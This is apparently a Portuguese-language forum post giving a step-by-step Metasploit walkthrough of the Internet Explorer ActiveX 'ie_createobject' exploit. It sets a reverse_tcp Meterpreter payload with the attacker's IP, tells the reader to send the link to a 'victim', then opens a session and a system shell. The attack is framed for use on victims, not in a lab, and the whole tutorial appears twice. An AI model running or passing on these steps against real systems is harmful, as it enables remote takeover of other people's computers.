Metasploit Penetration Testing Framework
Este módulo explora uma vulnerabilidade de execução genérica de código no Internet Explorer abusando de objetos Activex vulneráveis.
Autor: areax
Mais informações:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Abra sua Shell, e de o comando:
root@bt:~#msfconsole
Para abrir o MetaSploit
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Depois “show exploits” para exibir os exploits do MFS e procure por:
Windows/browser/ie_createobject
Feito isso vamos usar o comando “use” para definir o exploit que encontramos, segue abaixo o comando:
Msf> use Windows/browser/ie_createobject
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Configurando o exploit:
Siga os seguintes comando:
msf exploit(ie_createobject) > show options
(Esse comando exibe as opções do exploit)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
msf exploit(ie_createobject) > set SRVHOST (Seu ip)
(Esse comando define o ip de escuta.)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vamos definir agora o link do exploit, isso não é necessário, mas se quiser editar, siga o comando abaixo:
msf exploit(ie_createobject) > set URIPATH teste
Caso preferir, mude o nome "teste" por outro qualquer.
Vamos agora carregar o payload, de o comando “show payloads” para exibir os payloads disponíveis:
msf exploit(ie_createobject) > show payloads
Procure por “windows/meterpreter/reverse_tcp", após ter encontrado, rode o seguinte comando:
msf exploit(ie_createobject) > set payload windows/meterpreter/reverse_tcp
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Configurando o payload:
Siga os seguintes comando:
msf exploit(ie_createobject) > set LHOST (seu ip)
(Esse comando define o Ip no qual a vítima irá se conectar, no caso o seu.)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Tudo pronto, vamos agora rodar o exploit:
msf exploit(ie_createobject) > exploit
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Perceba que o serve está rodando e o MSF criou um endereço para que a vítima acesse-o.
PS: Veja que eu não usei o "URIPATH" do começo do tutorial, nisso o exploit definio o seguinte endereço:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Na máquina da vítima:
Indique o link para que ela acessse:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Logo após de acessar a página o exploit já dá a resposta para o servidor, veja:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Repare que foi criado uma sessão no Meterpreter, para abri-lá de o seguinte comando:
msf exploit(ie_createobject) > sessions --i 1
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Para ter acesso a shell do sistema rode o comando “shell”:
Meterpreter > shell
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Simples e prático.
Este módulo explora uma vulnerabilidade de execução genérica de código no Internet Explorer abusando de objetos Activex vulneráveis.
Autor: areax
Mais informações:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Abra sua Shell, e de o comando:
root@bt:~#msfconsole
Para abrir o MetaSploit
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Depois “show exploits” para exibir os exploits do MFS e procure por:
Windows/browser/ie_createobject
Feito isso vamos usar o comando “use” para definir o exploit que encontramos, segue abaixo o comando:
Msf> use Windows/browser/ie_createobject
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Configurando o exploit:
Siga os seguintes comando:
msf exploit(ie_createobject) > show options
(Esse comando exibe as opções do exploit)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
msf exploit(ie_createobject) > set SRVHOST (Seu ip)
(Esse comando define o ip de escuta.)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Vamos definir agora o link do exploit, isso não é necessário, mas se quiser editar, siga o comando abaixo:
msf exploit(ie_createobject) > set URIPATH teste
Caso preferir, mude o nome "teste" por outro qualquer.
Vamos agora carregar o payload, de o comando “show payloads” para exibir os payloads disponíveis:
msf exploit(ie_createobject) > show payloads
Procure por “windows/meterpreter/reverse_tcp", após ter encontrado, rode o seguinte comando:
msf exploit(ie_createobject) > set payload windows/meterpreter/reverse_tcp
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Configurando o payload:
Siga os seguintes comando:
msf exploit(ie_createobject) > set LHOST (seu ip)
(Esse comando define o Ip no qual a vítima irá se conectar, no caso o seu.)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Tudo pronto, vamos agora rodar o exploit:
msf exploit(ie_createobject) > exploit
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Perceba que o serve está rodando e o MSF criou um endereço para que a vítima acesse-o.
PS: Veja que eu não usei o "URIPATH" do começo do tutorial, nisso o exploit definio o seguinte endereço:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Na máquina da vítima:
Indique o link para que ela acessse:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Logo após de acessar a página o exploit já dá a resposta para o servidor, veja:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Repare que foi criado uma sessão no Meterpreter, para abri-lá de o seguinte comando:
msf exploit(ie_createobject) > sessions --i 1
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Para ter acesso a shell do sistema rode o comando “shell”:
Meterpreter > shell
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Simples e prático.
Comment